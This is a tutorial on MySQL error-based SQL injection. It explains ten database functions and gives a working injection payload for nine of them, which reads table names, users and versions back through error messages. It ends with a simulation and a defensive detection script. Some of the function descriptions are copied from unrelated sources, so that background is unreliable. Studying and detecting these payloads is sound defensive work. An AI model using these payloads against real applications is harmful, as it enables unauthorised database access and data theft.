1.Floor()
round() rounds a value to the given number of decimal places, e.g. round(1.45,0) = 1; round(1.55,0) = 2
floor() rounds down to the given number of decimal places, e.g. floor(1.45,0) = 1; floor(1.55,0) = 1
ceiling() rounds up to the given number of decimal places, e.g. ceiling(1.45,0) = 2; ceiling(1.55,0) = 2
floor(x) returns the largest integer less than or equal to x.
Here x stands for concat(database(), rand(0)*2): rand(0) uses 0 as the random seed and yields a number between 0 and 1, and the *2 scales it to a number between 0 and 2.
Root cause: a duplicate primary key in the GROUP BY temporary table. The three required ingredients are count(), rand() and group by.
payload:
id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
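The duplicate-key error above depends on one detail of how MySQL executes GROUP BY: the grouping expression is evaluated once to look up the group and, when the group does not exist yet, a second time to build the row that is inserted. The following simulation is an added example and not code from the original post; the key sequence it uses is constructed for illustration and is not MySQL's real rand(0) output.

```python
"""Added example (not from the original post): a simulation of the duplicate
key error behind the floor(rand(0)*2) ... GROUP BY trick.

MySQL collects GROUP BY results in a temporary table keyed on the grouping
expression. When a row's key is not found, the expression is evaluated a
second time to build the row that gets inserted. A key that can change
between those two evaluations (rand() inside floor()) can therefore collide
with a key that is already present, and the insert fails with MySQL's
"Duplicate entry ... for key ..." error. The key sequence used here is
constructed for illustration and is not MySQL's actual rand(0) output.
"""
from itertools import repeat
from typing import Iterable, Iterator


class DuplicateKeyError(Exception):
    """Stands in for MySQL's 'Duplicate entry' error on the temporary table."""


def group_count(row_count: int, keys: Iterator[str]) -> dict[str, int]:
    """Emulate SELECT count(*) ... GROUP BY x over `row_count` rows.

    `keys` yields one value of the grouping expression per evaluation; the
    expression is evaluated once for the lookup and, if the group is new,
    once more for the insert (the behaviour the trick depends on).
    """
    groups: dict[str, int] = {}
    for _ in range(row_count):
        lookup_key = next(keys)
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = next(keys)          # second evaluation of the same expression
        if insert_key in groups:
            raise DuplicateKeyError(
                f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def constant_key_demo() -> dict[str, int]:
    """A deterministic key never collides: three rows give one group of three."""
    return group_count(3, repeat("db_1"))


def random_key_demo(bits: Iterable[int] = (0, 1, 1, 0, 1, 1)) -> str:
    """Constructed floor(rand()*2) bit sequence: returns the MySQL-style error
    text, or 'no error' if the rows grouped cleanly."""
    keys = (f"db_{b}" for b in bits)
    try:
        group_count(3, keys)
    except DuplicateKeyError as exc:
        return str(exc)
    return "no error"


if __name__ == "__main__":
    print(constant_key_demo())   # {'db_1': 3}
    print(random_key_demo())     # Duplicate entry 'db_1' for key 'group_key'
```

With the constructed sequence 0, 1, 1, 0, 1, 1 the first row looks up db_0, misses, and is inserted as db_1; the second row finds db_1; the third row looks up db_0, misses again, and tries to insert db_1, which already exists. A sequence that is constant, or that never produces a miss followed by an existing key, groups without error, which is why the technique needs enough rows (hence information_schema.tables) for the collision to occur.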
2.ExtractValue()
ExtractValue(xml_frag, xpath_expr)
ExtractValue() takes two string arguments: a fragment of XML markup, xml_frag, and an XPath expression, xpath_expr (also called a locator). It returns the text (CDATA) of the first text node that is a child of the element matched by the XPath expression.
The first argument is the target XML document; the second argument is the XPath search path.
For example: SELECT ExtractValue('<a><b/></a>', '/a/b');
This selects the b node under the a node of the XML document above. If the XPath expression is malformed, MySQL raises an error and echoes the offending expression back in the message; the technique below uses exactly that behaviour to read out the data we want.
payload:
id=1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 1)));
3.UpdateXml()
UPDATEXML(XML_document, XPath_string, new_value);
First argument: XML_document, a string holding the XML document object (the Doc text).
Second argument: XPath_string, a string in XPath format; tutorials on XPath syntax are easy to find online if you are not familiar with it.
Third argument: new_value, a string that replaces the data matched by the XPath.
Our injection statement is:
id=1 and 1=(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))
The concat() call builds a string that does not conform to the XPATH_string format, so MySQL raises a malformed-XPath error that contains the concatenated data:
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
4.Exp()
exp() is the exponential function with base e:
mysql> select exp(1);
+-------------------+
| exp(1)            |
+-------------------+
| 2.718281828459045 |
+-------------------+
1 row in set (0.00 sec)
Large arguments overflow, however: once the argument exceeds 709 the function overflows and MySQL raises an error.
mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
Bitwise NOT of 0 returns 18446744073709551615, the maximum value of an unsigned BIGINT. So if a function call executes successfully and returns 0, bitwise-negating its result yields that maximum value, which is far beyond what exp() can handle.
mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
Bitwise-negating the subquery result and passing it to exp() produces a DOUBLE overflow error, and the error message carries the subquery along with it, which is how the data leaks out.
mysql> select exp(~(select * from(select database())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `x`.`database()` from (select database() AS `database()`) `x`)))'
When the query is issued from a scripting language, the erroring expression is rendered into its corresponding string form, like this:
DOUBLE value is out of range in 'exp(~((select 'error_based_hpf' from dual)))'
This realises the error-based injection.
payload:
id=1 and exp(~(select * from(select user())a));
5.GeometryCollection()
Understanding GeometryCollection: geometries are stored as points. A single point is written directly as coordinates (x, y); a line made up of several points is stored with LINESTRING(), which holds the points on that line.
payload:
id=1 and GeometryCollection((select * from(select user())a)b);
6.Polygon()
Polygon connects two or more vertices with straight line segments, outlines the resulting polygon with the current pen, and fills it with the current brush and polygon fill mode.
As shown in the figures:
- Figure 1 is a Polygon instance whose boundary is defined by an outer ring.
- Figure 2 is a Polygon instance whose boundary is defined by an outer ring and two inner rings. The area inside the inner rings is part of the exterior of the Polygon instance.
- Figure 3 is a valid Polygon instance because its inner rings intersect at a single tangent point.
payload:
id=1 and polygon((select * from(select * from(select user())a)b));
This can be understood as an injection where the injection point comes after a LIMIT clause.
7.MultiPoint
MultiPoint is a collection of zero or more points. The boundary of a MultiPoint instance is empty.
payload:
id = 1 and multipoint((select * from(select * from(select user())a)b));
8.MultiLineString()
MultiLineString is a collection of zero or more geometry or geography LineString instances.
As shown in the figures:
- Figure 1 shows a simple MultiLineString instance whose boundary is the four endpoints of its two LineString elements.
- Figure 2 shows a simple MultiLineString instance, because only the endpoints of its LineString elements intersect. The boundary is the two non-overlapping endpoints.
- Figure 3 shows a non-simple MultiLineString instance, because the interior of one of its LineString elements is intersected. The boundary of this MultiLineString instance is the four endpoints.
- Figure 4 shows a simple, non-closed MultiLineString instance.
- Figure 5 shows a simple, non-closed MultiLineString instance. It is not closed because its LineString elements are not closed. It is simple because the interiors of its LineString instances do not intersect.
- Figure 6 shows a simple, closed MultiLineString instance. It is closed because all of its elements are closed. It is simple because none of its elements intersect in their interiors.
payload:
id = 1 and multilinestring((select * from(select * from(select user())a)b));
9.LineString
LineString is a one-dimensional object representing a sequence of points and the line segments connecting those points.
As shown in the figures:
- Figure 1 shows a simple, non-closed LineString instance.
- Figure 2 shows a simple, non-closed LineString instance.
- Figure 3 shows a closed, simple LineString instance, which is therefore a ring.
- Figure 4 shows a closed, non-simple LineString instance, which is therefore not a ring.
payload:
id = 1 and LINESTRING((select * from(select * from(select user())a)b));
10.MultiPolygon()
MultiPolygon is a collection of zero or more Polygon instances.
As shown in the figures:
- Figure 1 is a MultiPolygon instance containing two Polygon elements. The boundary is defined by two outer rings and three inner rings.
- Figure 2 is a Polygon instance containing two MultiPolygon elements. The boundary is defined by two outer rings and three inner rings. The two Polygon elements intersect at a tangent point.
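All ten techniques above share two observable traits: the request carries a call to one of these functions with a subquery or concat() inside it (or floor(rand()) together with GROUP BY), and the database answers with an error message that echoes attacker-controlled content. The script below is an added detection example, not code from the original post; it runs both checks over constructed request strings and constructed MySQL error lines. The tag names, the FUNCS list and the sample lines are this example's own choices; the error message shapes are the ones quoted in sections 1 to 4 above.

```python
"""Added example, not code from the original post: defender-side detection of
the error-based primitives listed in sections 1 to 10. Two checks: (1) request
parameters that call one of those functions with a subquery or concat() as an
argument, or that combine floor(rand()) with GROUP BY; (2) MySQL error texts
that echo data back to the client (the XPATH and DOUBLE overflow messages
quoted above, plus the duplicate-entry message the group-by trick produces).
Every log line and request below is constructed for this example.
"""
import re
from urllib.parse import unquote_plus

FUNCS = ("extractvalue", "updatexml", "exp", "geometrycollection", "polygon",
         "multipoint", "multilinestring", "linestring", "multipolygon")

# A call to one of the functions above whose argument contains SELECT or concat(
FUNC_CALL = re.compile(
    r"\b(?:%s)\s*\(.*?(?:\bselect\b|\bconcat\s*\()" % "|".join(FUNCS), re.I | re.S)
# floor(rand(...)) followed by GROUP BY: the ingredients of the duplicate key error
RAND_GROUP_BY = re.compile(r"\bfloor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b", re.I | re.S)
# Error messages that carry attacker-chosen content in their quoted part
ERROR_TEXTS = {
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '([^']*)'"),
    "double_out_of_range": re.compile(r"DOUBLE value is out of range in '(.*)'"),
    "duplicate_entry": re.compile(r"Duplicate entry '([^']*)' for key"),
}


def scan_request(query_string: str) -> list[str]:
    """Return the detection tags that fire on a URL-encoded query string."""
    decoded = unquote_plus(query_string)
    tags = []
    if FUNC_CALL.search(decoded):
        tags.append("error_based_function_call")
    if RAND_GROUP_BY.search(decoded):
        tags.append("rand_group_by_duplicate_key")
    return tags


def scan_error(message: str):
    """Classify a MySQL error line; returns (kind, quoted_text) or None."""
    for kind, pattern in ERROR_TEXTS.items():
        match = pattern.search(message)
        if match:
            return kind, match.group(1)
    return None


def report(requests, errors) -> dict:
    """Run both checks over log material and summarise the findings."""
    flagged = {q: scan_request(q) for q in requests if scan_request(q)}
    leaking = []
    for line in errors:
        hit = scan_error(line)
        if hit:
            kind, quoted = hit
            # A legitimate overflow such as exp(710) matches too; a SELECT inside
            # the quoted text is the stronger sign that data is being read out.
            leaking.append((kind, quoted, bool(re.search(r"\bselect\b", quoted, re.I))))
    return {"flagged_requests": flagged, "leaking_errors": leaking}


# Constructed samples: three shaped like the payloads above, two benign.
SAMPLE_REQUESTS = [
    "id=1+and+extractvalue(1,+concat(0x7e,+(select+table_name+from+information_schema.tables+limit+1)))",
    "id=1+and+exp(~(select+*+from(select+user())a))",
    "id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
    "id=1&name=Polygon+Shop",
    "q=exponential+growth&page=2",
]
SAMPLE_ERRORS = [
    "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'error_based_hpf' from dual)))'",
    "ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'",
    "1 row in set (0.00 sec)",
]

if __name__ == "__main__":
    for key, value in report(SAMPLE_REQUESTS, SAMPLE_ERRORS).items():
        print(key, value)
```

The request check decodes the query string first, since `%28` and `+` are the usual ways these payloads arrive, and requires an opening parenthesis after the function name so that ordinary words such as "Polygon Shop" or "exponential" do not fire. The error check is most valuable at the application boundary: an error that quotes a SELECT statement should never reach the client in the first place, so the same patterns can drive an alert when they appear in a response body rather than only in the database log.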